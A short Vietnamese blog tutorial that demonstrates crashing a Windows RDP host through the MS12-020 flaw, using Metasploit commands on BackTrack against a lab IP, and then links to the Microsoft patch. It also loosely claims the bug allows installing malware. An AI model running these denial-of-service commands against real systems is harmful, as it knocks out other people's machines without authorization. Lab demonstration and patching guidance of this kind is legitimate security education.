Demo khai thác và fix lổ hổng MS12-020

Demo khai thác và fix lổ hổng MS12-020

Lỗ hổng bảo mật này cho phép hacker từ xa có thể làm tê liệt hoàn toàn máy tính bằng cách cài đặt các mã độc khi máy tính có mở dịch vụ Remote Desktop Protocol (RDP)

1. Demo: Sử dụng BackTrack 5R3

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Demo khai thac va fix lo hong MS12-020 show options

msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.0.2.52

Demo khai thac va fix lo hong MS12-020 set RHOST

msf auxiliary(ms12_020_maxchannelids) > exploit

Demo khai thac va fix lo hong MS12-020 exploit

2. Kết quả trên Victim: Khởi động lại sau vài giây

Demo khai thac va fix lo hong MS12-020 Victim

3. Khắc phục

– Update bản vá cho Windows Server 2008 Enterprise SP1 (như trong video dưới)
Hoặc download bản vá cho các phiên bản windows khác tại: https://technet.microsoft.com/library/security/ms12-020

Xem thêm video demo khai thác và fix lổ hổng MS12-020:

Bài viết cùng chủ đề

  1. Demo khai thác và fix lổ hổng MS12-020
  2. Hướng dẫn cài đặt Backtrack 5R3
Content Protection by DMCA.com

Comments

comments

This entry was posted in Linux, Security and tagged , , , , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *